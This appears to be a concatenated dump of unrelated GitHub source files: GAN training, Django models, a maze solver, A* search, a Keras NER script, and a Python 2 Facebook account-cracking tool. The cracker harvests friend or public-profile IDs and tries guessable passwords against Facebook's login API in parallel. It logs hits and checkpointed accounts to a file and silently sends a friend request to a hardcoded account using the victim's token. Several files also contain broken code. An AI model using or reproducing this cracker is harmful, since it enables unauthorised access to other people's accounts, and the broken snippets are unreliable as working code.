writer.add_histogram('D(G(z))', d_g_z, global_step=iteration)
writer.add_scalar('D_x_max', hist["D_x_max"][j], global_step=epoch)
writer.add_scalar('D_x_min', hist["D_x_min"][j], global_step=epoch)
writer.add_scalar('D_G_z_min', hist["D_G_z_min"][j], global_step=epoch)
writer.add_scalar('D_G_z_max', hist["D_G_z_max"][j], global_step=epoch)
# Save samples
if epoch % opt.sample_interval == 0:
tensorboard_sampling(fixed_noise, generator, writer, epoch)
# Save models
if epoch % opt.model_save_interval == 0:
num = str(int(epoch / opt.model_save_interval))
save_model(discriminator, optimizer_D, epoch, opt.model_save_path + "/" + num + "_D.pt")
save_model(generator, optimizer_G, epoch, opt.model_save_path + "/" + num + "_G.pt")
print("[Epoch Time: ", time.time() - t_epoch, "s]")
durer = time.gmtime(time.time() - t_total)
print("[Total Time: ", durer.tm_mday - 1, "j:", time.strftime("%Hh:%Mm:%Ss", durer), "]", sep='')
# Save model for futur training
if opt.model_save_interval < opt.n_epochs + 1:
save_model(discriminator, optimizer_D, epoch, opt.model_save_path + "/last_D.pt")
save_model(generator, optimizer_G, epoch, opt.model_save_path + "/last_G.pt")
writer.close()
| [
"[email protected]"
] | |
73f418059cd93c1b2a8f0ff43f32f7dec2126d23 | bed5bc17c2ae6914d3c0f797b399cf3e581567fe | /shopping/shop_app/models/category.py | b84cfdbcca933cdbfeea29e33d5faf73b11f587e | [] | no_license | the-vampiire/medi_assessment | 5eb12ad38b2dd24ac64371f7c50fcdd241fbbdeb | 6a316c4c13ac36e3981487b2846ee802183f7761 | refs/heads/master | 2021-04-15T03:55:57.900107 | 2018-04-02T04:59:36 | 2018-04-02T04:59:36 | 126,254,426 | 2 | 2 | null | 2018-03-26T09:44:10 | 2018-03-21T23:52:11 | Python | UTF-8 | Python | false | false | 276 | py | from django.db import models
class Category(models.Model):
class Meta:
db_table = 'categories'
verbose_name = 'category'
verbose_name_plural = 'categories'
name = models.CharField(max_length = 50, blank = False)
def __str__(self):
return self.name
| [
"[email protected]"
] | |
132a673c4540d33115e6d942dd7104bf39238eeb | f56f89b4834b4dde8cb2528a013e36e217e28eff | /accounts/models.py | 5b88a8a13c358d98c14b1c72bbd4424e083f80dc | [] | no_license | mainliner/paintind | 6c271ac8bb42b96d2b0add5c73c6a2cf4480c4bc | bd3c9282b655716c8f687a812b1735406c76b6e7 | refs/heads/master | 2020-12-24T13:43:55.951264 | 2013-09-14T09:01:31 | 2013-09-14T09:01:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from django.db import models
from django.contrib.auth.models import User
class User_info(models.Model):
user = models.ForeignKey(User)
photo = models.CharField(max_length=500)
fans_num = models.IntegerField()
follower_num = models.IntegerField()
describe = models.CharField(max_length=500)
def __unicode__(self):
return self.user
class Fans(models.Model):
user = models.ForeignKey(User)
fans = models.CharField(max_length=200)
class Follower(models.Model):
user = models.ForeignKey(User)
follower = models.CharField(max_length=200) | [
"[email protected]"
] | |
c417b65d88af2a41f1a6f2a8abc0ebe574230c12 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /tbz5ji3ocwzAeLQNa_17.py | e50d572a8bfe14ab16d76f9f91ad29fc1f351a4f | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 698 | py |
def exit_maze(maze, directions):
l = len(maze)
w = len(maze[0])
for y in range(l):
for x in range(w):
if maze[y][x] == 2:
sx = x
sy = y
for i in directions:
if i == 'N':
sy -= 1
elif i == 'E':
sx += 1
elif i == 'S':
sy += 1
elif i == 'W':
sx -= 1
else:
return 'Bad Direction'
if sy < 0 or sy >= l:
return 'Dead'
if sx < 0 or sx >= w:
return 'Dead'
if maze[sy][sx] == 1:
return 'Dead'
if maze[sy][sx] == 3:
return 'Finish'
return 'Lost'
| [
"[email protected]"
] | |
d93299d81fdc7fe2ace91bc0ea286e69ce8136aa | cda54a77875d95fb0a60f3655263b2e3d68984bf | /program0_test.py | 873aa777ac19e4737180c9534a3686abde3c2455 | [] | no_license | bilashProshad/Python-code | 87ef96d62bc262648427980b357e1cb7de56194d | 4d84238f3c57d6877d23629fd10c9d0bee6fb35e | refs/heads/master | 2023-05-04T10:54:48.481436 | 2021-05-26T19:50:36 | 2021-05-26T19:50:36 | 371,153,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,368 | py | graph = {
"S": {"A": 2, "B": 1, "G": 9},
"A": {"C": 2, "D": 3},
"B": {"D": 2, "E": 4},
"C": {"G": 4},
"D": {"G": 4},
"E": {"E":0}
}
heuristic = {
"S": 6,
"A": 0,
"B": 6,
"C": 4,
"D": 1,
"E": 10,
"G": 0
}
class graphProblem:
def __init__(self, initial, goal, graph):
self.initial = initial
self.goal = goal
self.graph = graph
def actions(self, state):
return list(self.graph[state].keys())
def result(self, state, action):
return action
def goal_test(self, state):
return state == self.goal
def path_cost(self, cost_so_far, state1, action, state2):
return cost_so_far + self.graph[state1][state2]
class Node:
def __init__(self, state, parent=None, action=None, path_cost=0):
self.state = state
self.parent = parent
self.action = action
self.path_cost = path_cost
def expand(self, graphProblem):
return [self.child_node(graphProblem, action)
for action in graphProblem.actions(self.state)]
def child_node(self, graphProblem, action):
next_state = graphProblem.result(self.state, action)
return Node(next_state, self, action,
graphProblem.path_cost(self.path_cost, self.state, action, next_state))
def path(self):
node, path_back = self, []
while node:
path_back.append(node)
node = node.parent
return list(reversed(path_back))
def solution(self):
return [node.action for node in self.path()[1:]]
class Queue:
def __init__(self, pop_index):
self.queue = []
self.pop_index = pop_index
def append(self, item):
self.queue.append(item)
def sortAppend(self, item, f):
self.queue.append(item)
self.queue.sort(key=f)
def extend(self, items):
self.queue.extend(items)
def pop(self):
if len(self.queue) > 0:
return self.queue.pop(self.pop_index)
else:
raise Exception('FIFOQueue is empty')
def printQueue(self):
def __len__(self):
return len(self.queue)
def __contains__(self, item):
return item in self.queue
def best_first_search(problem, f, pop_index=0):
node = Node(problem.initial)
if problem.goal_test(node.state):
return state
frontier = Queue(pop_index)
frontier.sortAppend(node, f)
explored = set()
while frontier:
frontier.printQueue()
node = frontier.pop()
if problem.goal_test(node.state):
return node
explored.add(node.state)
for child in node.expand(problem):
if child.state not in explored and child not in frontier:
frontier.sortAppend(child, f)
return None
def a_star(problem):
return best_first_search(problem, lambda node: node.path_cost + heuristic[node.state])
def gbfs(problem):
return best_first_search(problem, lambda node: heuristic[node.state])
graph_problem = graphProblem("S", "G", graph)
print("--------------GBFS--------------")
goalnode = gbfs(graph_problem)
print(goalnode.solution())
print('Path Cost: ', goalnode.path_cost, "\n")
print("--------------A*--------------")
goalnode = a_star(graph_problem)
print(goalnode.solution())
print('Path Cost: ', goalnode.path_cost)
| [
"[email protected]"
] | |
ebd9d906222fd020229e5ca693eed78aaf12a12e | 31134588835ee5e3e0a20fea8797789a5c74fe33 | /Tamoo | 518e8c3856f6d7dd35603320fd552101e3c5d1bf | [] | no_license | tamoo320/ally | dc16815cd5bc4b26dd49e83c24bf01521b832848 | 8a92bf7bbfe1041185c92a4b44483aa24b7737f5 | refs/heads/master | 2022-06-30T18:35:40.478192 | 2020-05-12T15:47:34 | 2020-05-12T15:47:34 | 263,379,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,710 | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """ -----------------------------•◈•
( __)\\ ____--------------_------------•◈•
|__(~) •||•THE - Tamoo -OFFICAL------•◈•
|__\~~) •||•Khan- Pathan---------------•◈•
|__(-----\ •◈•------AFTHZ-Owner-----•◈•
|__~~~\ •◈•-----█-------4-------█------•◈•
|__~~~\ •◈•-----█-------2-------█------•◈•
|__~~~\ •◈•-----█-------0-------█------•◈•
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mRana Aahil
\033[1;96mInstagram \033[1;93m: \033[1;FlowRana
\033[1;96mFacebook \033[1;93m: \033[1; Aahilrna4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/Therana/zero
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
Open = []
check = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mAbdullah
\033[1;96mInstagram \033[1;93m: \033[1;92mPathan
\033[1;96mFacebook \033[1;93m: \033[1;92m Abdullah
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/tamoo302/ally
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "ally"
CorrectPassword = "ally"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"[email protected]"
] | ||
2072ae91d99cd4b79f0e44d24a9b507f95cc2c02 | f5772055d0d876271c1725b22bf72bf7ee8b023f | /ner/hash-2-pos-chunk-128-64.py | 9a5a7e42c73ba9b892d942f61600770f14abf000 | [
"MIT"
] | permissive | danche354/Sequence-Labeling | 175d01d82d0909d83d9f74507a897fb7c663ab66 | 1af1fbbacf2db4f969b6046d39eee24623a11cc0 | refs/heads/master | 2020-06-11T03:29:10.068740 | 2017-07-16T14:43:43 | 2017-07-16T14:43:43 | 76,015,154 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,562 | py | from keras.models import Model
from keras.layers import Input, Masking, Dense, LSTM
from keras.layers import Dropout, TimeDistributed, Bidirectional, merge
from keras.layers.embeddings import Embedding
from keras.utils import np_utils
import numpy as np
import pandas as pd
import sys
import math
import os
from datetime import datetime
# add path
sys.path.append('../')
sys.path.append('../tools')
from tools import conf
from tools import load_data
from tools import prepare
from tools import plot
np.random.seed(0)
# train hyperparameters
step_length = conf.ner_step_length
pos_length = conf.ner_pos_length
chunk_length = conf.ner_chunk_length
hash_vocab = conf.ner_hash_vocab
hash_length = conf.ner_hash_length
output_length = conf.ner_IOB_length
batch_size = conf.batch_size
nb_epoch = conf.nb_epoch
model_name = os.path.basename(__file__)[:-3]
folder_path = 'model/%s'%model_name
if not os.path.isdir(folder_path):
os.makedirs(folder_path)
# the data, shuffled and split between train and test sets
train_data = load_data.load_ner(dataset='eng.train')
dev_data = load_data.load_ner(dataset='eng.testa')
train_samples = len(train_data)
dev_samples = len(dev_data)
print('train shape:', train_samples)
print('dev shape:', dev_samples)
print()
hash_embedding = pd.read_csv('../preprocessing/ner-auto-encoder-2/auto-encoder-embeddings.txt', delimiter=' ', header=None)
hash_embedding = hash_embedding.values
hash_embedding = np.concatenate([np.zeros((1,hash_length)),hash_embedding, np.random.rand(1,hash_length)])
hash_index_input = Input(shape=(step_length,))
encoder_embedding = Embedding(hash_vocab+2, hash_length, weights=[hash_embedding], mask_zero=True, input_length=step_length)(hash_index_input)
pos_input = Input(shape=(step_length, pos_length))
chunk_input = Input(shape=(step_length, chunk_length))
hash_pos_chunk_merge = merge([encoder_embedding, pos_input, chunk_input], mode='concat')
input_mask = Masking(mask_value=0)(hash_pos_chunk_merge)
dp_1 = Dropout(0.5)(input_mask)
hidden_1 = Bidirectional(LSTM(128, return_sequences=True))(dp_1)
hidden_2 = Bidirectional(LSTM(64, return_sequences=True))(hidden_1)
dp_2 = Dropout(0.5)(hidden_2)
output = TimeDistributed(Dense(output_length, activation='softmax'))(dp_2)
model = Model(input=[hash_index_input,pos_input,chunk_input], output=output)
model.compile(loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
print(model.summary())
number_of_train_batches = int(math.ceil(float(train_samples)/batch_size))
number_of_dev_batches = int(math.ceil(float(dev_samples)/batch_size))
print('start train %s ...\n'%model_name)
best_accuracy = 0
best_epoch = 0
all_train_loss = []
all_dev_loss = []
all_dev_accuracy = []
log = open('%s/model_log.txt'%folder_path, 'w')
start_time = datetime.now()
print('train start at %s\n'%str(start_time))
log.write('train start at %s\n\n'%str(start_time))
for epoch in range(nb_epoch):
start = datetime.now()
print('-'*60)
print('epoch %d start at %s'%(epoch, str(start)))
log.write('-'*60+'\n')
log.write('epoch %d start at %s\n'%(epoch, str(start)))
train_loss = 0
dev_loss = 0
np.random.shuffle(train_data)
for i in range(number_of_train_batches):
train_batch = train_data[i*batch_size: (i+1)*batch_size]
embed_index, hash_index, pos, chunk, label, length, sentence = prepare.prepare_ner(batch=train_batch, gram='bi')
pos = np.array([(np.concatenate([np_utils.to_categorical(p, pos_length), np.zeros((step_length-length[l], pos_length))])) for l,p in enumerate(pos)])
chunk = np.array([(np.concatenate([np_utils.to_categorical(c, chunk_length), np.zeros((step_length-length[l], chunk_length))])) for l,c in enumerate(chunk)])
y = np.array([np_utils.to_categorical(each, output_length) for each in label])
train_metrics = model.train_on_batch([hash_index, pos, chunk], y)
train_loss += train_metrics[0]
all_train_loss.append(train_loss)
correct_predict = 0
all_predict = 0
for j in range(number_of_dev_batches):
dev_batch = dev_data[j*batch_size: (j+1)*batch_size]
embed_index, hash_index, pos, chunk, label, length, sentence = prepare.prepare_ner(batch=dev_batch,gram='bi')
pos = np.array([(np.concatenate([np_utils.to_categorical(p, pos_length), np.zeros((step_length-length[l], pos_length))])) for l,p in enumerate(pos)])
chunk = np.array([(np.concatenate([np_utils.to_categorical(c, chunk_length), np.zeros((step_length-length[l], chunk_length))])) for l,c in enumerate(chunk)])
y = np.array([np_utils.to_categorical(each, output_length) for each in label])
# for loss
dev_metrics = model.test_on_batch([hash_index, pos, chunk], y)
dev_loss += dev_metrics[0]
# for accuracy
prob = model.predict_on_batch([hash_index, pos, chunk])
for i, l in enumerate(length):
predict_label = np_utils.categorical_probas_to_classes(prob[i])
correct_predict += np.sum(predict_label[:l]==label[i][:l])
all_predict += np.sum(length)
epcoh_accuracy = float(correct_predict)/all_predict
all_dev_accuracy.append(epcoh_accuracy)
all_dev_loss.append(dev_loss)
if epcoh_accuracy>=best_accuracy:
best_accuracy = epcoh_accuracy
best_epoch = epoch
end = datetime.now()
model.save('%s/model_epoch_%d.h5'%(folder_path, epoch), overwrite=True)
print('epoch %d end at %s'%(epoch, str(end)))
print('epoch %d train loss: %f'%(epoch, train_loss))
print('epoch %d dev loss: %f'%(epoch, dev_loss))
print('epoch %d dev accuracy: %f'%(epoch, epcoh_accuracy))
print('best epoch now: %d\n'%best_epoch)
log.write('epoch %d end at %s\n'%(epoch, str(end)))
log.write('epoch %d train loss: %f\n'%(epoch, train_loss))
